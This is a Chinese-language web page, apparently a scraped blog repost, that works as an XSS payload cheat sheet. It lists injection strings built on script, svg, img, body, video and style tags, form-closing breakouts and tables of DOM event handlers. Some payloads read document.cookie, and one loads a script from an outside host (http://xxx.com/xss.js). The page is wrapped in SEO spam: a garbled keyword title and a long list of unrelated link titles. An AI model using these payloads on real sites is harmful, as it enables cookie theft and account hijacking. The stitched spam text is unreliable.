当前位置: 首页 > news >正文

网站开发现在怎么样263企业邮箱修改密码

网站开发现在怎么样,263企业邮箱修改密码,如何自己做网站推广淘宝客,如何创建个人微信公众号XSS 主要是针对网页客户端的一种攻击&#xff0c;那么就要执行 JavaScript 代码&#xff0c;那么无疑需要用到 JavaScript 语言以及在 HTML 中可以解析 JavaScript 代码的标签。 1、标签类 &#xff08;1&#xff09;script <script></script>标签是最直接的 xS…

XSS 主要是针对网页客户端的一种攻击,那么就要执行 JavaScript 代码,那么无疑需要用到 JavaScript 语言以及在 HTML 中可以解析 JavaScript 代码的标签。

1、标签类

(1)script

<script></script>标签是最直接的 xSS payload,标签可以在浏览器渲染 DOM 树的时候同步执行 Javascript 代码,他可以引用外部,也可以将代码插入标签内
<script>alert("xss")</script>
<script>alert(/xss/)</script>
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<script src=http://xxx.com/xss.js></script>

(2)svg

<svg></svg>标签是标记定义 5VG 图形的容器,其在 onload 方法中是在 SVG 容器初始化的时候执行代码
<svg onload="alert(1)">

(3)img

<img />标签是加载图片资源的标签,其在无法加载图片资源的时候会执行 onerror 方法

<img src=1 onerror=alert("/xss/")>
<img src=l onerror=alert(document.cookie)>
<img src="正确图片地址"onload="alert(/xss/)"/>

(4)body

<body></body> 是定义 HTML 文档的主体。其包含文档的所有内容(比如文本、超链接、图像、表格和列表等等。)

<body onload=alert(/xss/)>
<body onpageshow=alert(1)>

(5)video

<video></video>标签是引用远程媒体视频的标签,用法与 img 类似
<video onerror="alert(/xss/)" src="1"/>

(6)style

<style></style>标签是加载 css 资源的标签
<style onload=alert(1)></style>

2、表单类

在 web 中,最常见的为表单了,表单中的标签有<input />、<textarea></textarea>等等 在这里更多的是闭合语句来构成 XSS 比如

"/><script>alert(/xss/)</script>
></textareax<script>alert(/xss/)</script>

3、事件类

在 HTML 中,有许多事件操作的方法(DOM 事件),如 onclick 事件、ondblclick 事件等等,只需要用户点击,或者双击也可以执行 JavaScript 代码需要闭合,在块级元素中添加事件方法。

(1)鼠标事件

事件名称描述DOM
onclick当用户点击某个对象时调用的事件句柄。2
oncontextmenu在用户点击鼠标右键打开上下文菜单时触发
ondblclick当用户双击某个对象时调用的事件句柄。2
onmousedown鼠标按钮被按下。2
onmouseenter当鼠标指针移动到元素上时触发。2
onmouseleave当鼠标指针移出元素时触发2
onmousemove鼠标被移动。2
onmouseout鼠标从某元素移开。2
onmouseover鼠标移到某元素之上。2
onmouseup鼠标按键被松开。2
onmousewheel鼠标滚轮被滚动。2

(2)键盘事件

事件名称描述DOM
onkeypress某个键盘的键被按下并松开。2
onkeydown某个键盘的键被按下。2
onkeyup某个键盘的键被松开。2

(3)框架/对象(Frame/Object)事件

事件名称描述DOM
onabort图像的加载被中断。 ( )2
onbeforeunload该事件在即将离开页面(刷新或关闭)时触发
onerror在加载文档或图像时发生错误。 ( , 和 )2
onhashchange该事件在当前 URL 的锚部分发生修改时触发。
onload一张页面或一幅图像完成加载。
onpageshow该事件在用户访问页面时触发2
onpopstate该事件在窗口历史记录改变时触发。
onresize窗口或框架被重新调整大小。2
onscroll当文档被滚动时触发的事件。2
onunload用户退出页面。 ( )2

等,详见链接https://www.runoob.com/jsref/dom-obj-event.html

http://www.dtcms.com/a/418095.html

相关文章:

  • 佛山电商网站制作团队上海关键词优化排名软件
  • 建设保护动物网站的素材做电影网站犯法
  • 网站建设咨询公网站关键词选择
  • 文本文档做网站怎么加图片聊天软件开发厂家有哪些
  • 在线商城网站备案郑州网络营销哪个好
  • 网站管理工作一般包括宣传片拍摄制作流程
  • 怎样做运营一个网站平面作品集展示图片
  • 网站做淘宝客有什么要求app引流推广怎么做
  • 大型网站开发pdf网站没备案怎么做淘宝客
  • 如何做局域网网站网站难做
  • 网站定制系统数据处理软件餐饮网站建设研究问题
  • 新昌网站建设阿里云搭建网站多少钱
  • 可以建网站的软件网站后台不能上传图片
  • 10G网站空间国内三大oa系统
  • 甘肃自助建站系统哪家好个人建站系统
  • 南京网站开发荐南京乐识wordpress 百度 插件怎么用
  • 合肥网站优化费用单页站好做seo吗
  • 做搜狗手机网站排名软青岛网上房地产网签查询
  • 运城市做网站价格东莞网络推广代理
  • 廊坊网站公司wordpress如何重装
  • php网站后台怎么进手机上怎么建立公众号
  • 二道江网站建设网站接入服务 公司
  • 经常用表格进行页面布局东莞网站优化哪里找
  • 设计素材网站源码wordpress新闻小程序
  • 怎么做快三一模一样的网站哈尔滨市建设工程交易网
  • 外贸企业网站模板欧洲做r18 cg的网站
  • 山东高端网站建设服务商免费的个人简历模板下载
  • 网站制作可以nanopi neo做网站
  • 网站建设南通高端品牌logo
  • 怎么做网站图片链接购物网站开发 书籍